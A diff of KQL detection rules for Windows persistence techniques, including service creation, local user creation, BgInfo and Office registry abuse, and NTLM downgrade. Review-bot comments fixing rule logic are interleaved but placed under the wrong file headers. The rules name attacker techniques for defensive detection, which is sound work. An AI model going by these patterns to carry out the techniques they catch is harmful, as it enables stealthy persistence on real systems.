+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.002
+// False Positives:
+// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
index 71d92e82..3d35bef5 100644
--- a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
+++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql
@@ -1,12 +1,12 @@
-// Title: NET NGenAssemblyUsageLog Registry Key Tamper
-// Author: frack113
-// Date: 2022-11-18
-// Level: high
-// Description: Detects changes to the NGenAssemblyUsageLog registry key.
-// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
-// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: NET NGenAssemblyUsageLog Registry Key Tamper
+// Author: frack113
+// Date: 2022-11-18
+// Level: high
+// Description: Detects changes to the NGenAssemblyUsageLog registry key.
+// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
index 3fd74516..ea1a67da 100644
--- a/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
+++ b/KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql
@@ -1,12 +1,12 @@
-// Title: NetNTLM Downgrade Attack - Registry
-// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
-// Date: 2018-03-20
-// Level: high
-// Description: Detects NetNTLM downgrade attack
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112
-// False Positives:
-// - Services or tools that set the values to more restrictive values
-
-DeviceRegistryEvents
+// Title: NetNTLM Downgrade Attack - Registry
+// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
+// Date: 2018-03-20
+// Level: high
+// Description: Detects NetNTLM downgrade attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112
+// False Positives:
+// - Services or tools that set the values to more restrictive values
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
index 470e3da8..a5a41fc3 100644
--- a/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql
@@ -1,12 +1,12 @@
-// Title: New BgInfo.EXE Custom DB Path Registry Configuration
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-16
-// Level: medium
-// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate use of external DB to save the results
-
-DeviceRegistryEvents
+// Title: New BgInfo.EXE Custom DB Path Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of external DB to save the results
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
index 1b5c6e76..13bb63f2 100644
--- a/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql
@@ -1,12 +1,12 @@
-// Title: New BgInfo.EXE Custom VBScript Registry Configuration
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate VBScript
-
-DeviceRegistryEvents
+// Title: New BgInfo.EXE Custom VBScript Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate VBScript
+
+DeviceRegistryEvents
 | where RegistryValueData startswith "4" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
index 0de9fa9b..95e12749 100644
--- a/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
+++ b/KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql
@@ -1,12 +1,12 @@
-// Title: New BgInfo.EXE Custom WMI Query Registry Configuration
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Legitimate WMI query
-
-DeviceRegistryEvents
+// Title: New BgInfo.EXE Custom WMI Query Registry Configuration
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: medium
+// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate WMI query
+
+DeviceRegistryEvents
 | where RegistryValueData startswith "6" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
index 8ecf6644..8d69c498 100644
--- a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
+++ b/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
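Review bot: As in the VBScript sibling rule, `RegistryKey endswith "\\Software\\Winternals\\BGInfo\\UserFields*"` can never match because KQL `endswith` compares the `*` literally. Suggest `| where RegistryValueData startswith "6" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"`. The `startswith "6"` prefix test is also loose (it would match data beginning with `60`), so if the field type encoding is a single digit, `RegistryValueData startswith "6\t"` or a `split`-based check would be tighter — confirm the UserFields data format before narrowing.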
@@ -1,12 +1,12 @@
-// Title: New Kernel Driver Via SC.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Rare legitimate installation of kernel drivers via sc.exe
-
-DeviceProcessEvents
+// Title: New Kernel Driver Via SC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: medium
+// Description: Detects creation of a new service (kernel driver) with the type "kernel"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Rare legitimate installation of kernel drivers via sc.exe
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_odbc_driver_registered.kql b/KQL/rules/Persistence/new_odbc_driver_registered.kql
index e2ff7413..d0f4d9c8 100644
--- a/KQL/rules/Persistence/new_odbc_driver_registered.kql
+++ b/KQL/rules/Persistence/new_odbc_driver_registered.kql
@@ -1,12 +1,12 @@
-// Title: New ODBC Driver Registered
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-23
-// Level: low
-// Description: Detects the registration of a new ODBC driver.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Likely
-
-DeviceRegistryEvents
+// Title: New ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: low
+// Description: Detects the registration of a new ODBC driver.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/Persistence/new_service_creation_using_powershell.kql
index 9ff9349e..29a821f6 100644
--- a/KQL/rules/Persistence/new_service_creation_using_powershell.kql
+++ b/KQL/rules/Persistence/new_service_creation_using_powershell.kql
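Review bot: The two `endswith` conditions on RegistryKey in this query are mutually exclusive — a key cannot end with both `\\SOFTWARE\\ODBC\\ODBCINST.INI*` (the `*` is a literal character in KQL) and `\\Driver` — so the rule never matches, and the `\\SQL Server*` exclusion has the same wildcard residue. `Driver` is the value name under `ODBCINST.INI\<driver name>`, which DeviceRegistryEvents exposes in RegistryValueName rather than at the end of RegistryKey. Suggest `| where RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI\\" and RegistryValueName =~ "Driver"`, with the SQL Server exclusion rewritten as `RegistryKey endswith "\\SQL Server"`. Since the rule is "low" with likely false positives, projecting RegistryKey, RegistryValueData and InitiatingProcessFolderPath in the output would make triage of the installer much faster.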
@@ -1,13 +1,13 @@
-// Title: New Service Creation Using PowerShell
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023-02-20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Legitimate administrator or user creates a service for legitimate reasons.
-// - Software installation
-
-DeviceProcessEvents
+// Title: New Service Creation Using PowerShell
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using powershell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate administrator or user creates a service for legitimate reasons.
+// - Software installation
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql
index b052820a..d92b8c78 100644
--- a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql
+++ b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql
@@ -1,13 +1,13 @@
-// Title: New Service Creation Using Sc.EXE
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023-02-20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
-// False Positives:
-// - Legitimate administrator or user creates a service for legitimate reasons.
-// - Software installation
-
-DeviceProcessEvents
+// Title: New Service Creation Using Sc.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using the "sc.exe" utility.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate administrator or user creates a service for legitimate reasons.
+// - Software installation
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
index 2ef19710..660cb5a5 100644
--- a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
+++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql
@@ -1,12 +1,12 @@
-// Title: New TimeProviders Registered With Uncommon DLL Name
-// Author: frack113
-// Date: 2022-06-19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-// Adversaries may abuse time providers to execute DLLs when the system boots.
-// The Windows Time service (W32Time) enables time synchronization across and within domains.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003
-
-DeviceRegistryEvents
+// Title: New TimeProviders Registered With Uncommon DLL Name
+// Author: frack113
+// Date: 2022-06-19
+// Level: high
+// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+// Adversaries may abuse time providers to execute DLLs when the system boots.
+// The Windows Time service (W32Time) enables time synchronization across and within domains.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/Persistence/new_user_created_via_net_exe.kql
index 1f789bc2..12efcded 100644
--- a/KQL/rules/Persistence/new_user_created_via_net_exe.kql
+++ b/KQL/rules/Persistence/new_user_created_via_net_exe.kql
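Review bot: `RegistryKey endswith "\\DllName"` will not match Advanced Hunting data: `DllName` is the value name under each TimeProviders subkey, which DeviceRegistryEvents stores in RegistryValueName rather than appending it to RegistryKey the way Sysmon's TargetObject does. Suggest `| where RegistryKey contains "\\Services\\W32Time\\TimeProviders\\" and RegistryValueName =~ "DllName"`, keeping the existing `RegistryValueData in~ (...)` exclusions. Adding `and ActionType == "RegistryValueSet"` would also avoid alerting on the deletion of a provider, which otherwise carries an empty RegistryValueData that is not in the exclusion list.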
@@ -1,13 +1,13 @@
-// Title: New User Created Via Net.EXE
-// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
-// Date: 2018-10-30
-// Level: medium
-// Description: Identifies the creation of local users via the net.exe command.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1136.001
-// False Positives:
-// - Legitimate user creation.
-// - Better use event IDs for user creation rather than command line rules.
-
-DeviceProcessEvents
+// Title: New User Created Via Net.EXE
+// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
+// Date: 2018-10-30
+// Level: medium
+// Description: Identifies the creation of local users via the net.exe command.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+// - Legitimate user creation.
+// - Better use event IDs for user creation rather than command line rules.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
index 65940bab..ca433ac1 100644
--- a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
+++ b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
@@ -1,12 +1,12 @@
-// Title: New User Created Via Net.EXE With Never Expire Option
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-12
-// Level: high
-// Description: Detects creation of local users via the net.exe command with the option "never expire"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1136.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: New User Created Via Net.EXE With Never Expire Option
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the option "never expire"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
index c75228b3..9c99873a 100644
--- a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
+++ b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Non-privileged Usage of Reg or Powershell
-// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
-// Date: 2020-10-05
-// Level: high
-// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceProcessEvents
+// Title: Non-privileged Usage of Reg or Powershell
+// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
+// Date: 2020-10-05
+// Level: high
+// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/Persistence/office_application_startup_office_test.kql
index 0afb47c7..bc1e9378 100644
--- a/KQL/rules/Persistence/office_application_startup_office_test.kql
+++ b/KQL/rules/Persistence/office_application_startup_office_test.kql
@@ -1,12 +1,12 @@
-// Title: Office Application Startup - Office Test
-// Author: omkar72
-// Date: 2020-10-25
-// Level: medium
-// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137.002
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Office Application Startup - Office Test
+// Author: omkar72
+// Date: 2020-10-25
+// Level: medium
+// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/Persistence/office_macros_warning_disabled.kql
index 73dc8242..a1d37a25 100644
--- a/KQL/rules/Persistence/office_macros_warning_disabled.kql
+++ b/KQL/rules/Persistence/office_macros_warning_disabled.kql
@@ -1,12 +1,12 @@
-// Title: Office Macros Warning Disabled
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-05-22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Office Macros Warning Disabled
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
index 474820dd..f3d70682 100644
--- a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
+++ b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
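Review bot: Both halves of this predicate are Sysmon-shaped and are unlikely to match anything in DeviceRegistryEvents. `VBAWarnings` is a value name, which Advanced Hunting exposes in RegistryValueName rather than at the end of RegistryKey, and DWORD data is recorded as the plain number (e.g. `"1"`, with the type in RegistryValueType) rather than the Sysmon string `"DWORD (0x00000001)"` — confirm on your tenant before relying on it. Suggest `| where RegistryKey endswith "\\Security" and RegistryKey contains "\\Microsoft\\Office\\" and RegistryValueName =~ "VBAWarnings" and RegistryValueData =~ "1"`. Without the `\\Microsoft\\Office\\` fragment the `\\Security` suffix alone would match unrelated keys once the value-name check is separated out.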
@@ -1,10 +1,10 @@
-// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql
index 2c548b80..842110b0 100644
--- a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql
+++ b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql
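Review bot: `RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"` and `RegistryValueData =~ "DWORD (0x00000001)"` both carry Sysmon conventions that DeviceRegistryEvents does not use: the value name is a separate column (RegistryValueName) and DWORD data appears as the bare number with the type in RegistryValueType — verify the data format on your tenant. Suggest `| where RegistryKey endswith "\\Outlook\\Security" and RegistryValueName =~ "EnableUnsafeClientMailRules" and RegistryValueData =~ "1"`. As converted, this "high" rule would silently never fire, which is worse than a noisy one.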
@@ -1,12 +1,12 @@
-// Title: Outlook Security Settings Updated - Registry
-// Author: frack113
-// Date: 2021-12-28
-// Level: medium
-// Description: Detects changes to the registry values related to outlook security settings
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137
-// False Positives:
-// - Administrative activity
-
-DeviceRegistryEvents
+// Title: Outlook Security Settings Updated - Registry
+// Author: frack113
+// Date: 2021-12-28
+// Level: medium
+// Description: Detects changes to the registry values related to outlook security settings
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative activity
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql
index 68500c23..0bfb3ba5 100644
--- a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql
+++ b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql
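Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*"` cannot be satisfied: KQL `endswith` treats the `*` literally, and the two conditions demand different suffixes anyway. The Sigma intent (key contains both fragments) is `| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office\\" and RegistryKey contains "\\Outlook\\Security"`. Because DeviceRegistryEvents keeps the value name in RegistryValueName, projecting that column alongside RegistryValueData is what lets an analyst see which setting (e.g. `Level`, `ObjectModelGuard`) was touched.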
@@ -1,12 +1,12 @@
-// Title: Path To Screensaver Binary Modified
-// Author: Bartlomiej Czyz @bczyz1, oscd.community
-// Date: 2020-10-11
-// Level: medium
-// Description: Detects value modification of registry key containing path to binary used as screensaver.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
-// False Positives:
-// - Legitimate modification of screensaver
-
-DeviceRegistryEvents
+// Title: Path To Screensaver Binary Modified
+// Author: Bartlomiej Czyz @bczyz1, oscd.community
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects value modification of registry key containing path to binary used as screensaver.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+// - Legitimate modification of screensaver
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
index a46ba71c..ea9b0f14 100644
--- a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
+++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql
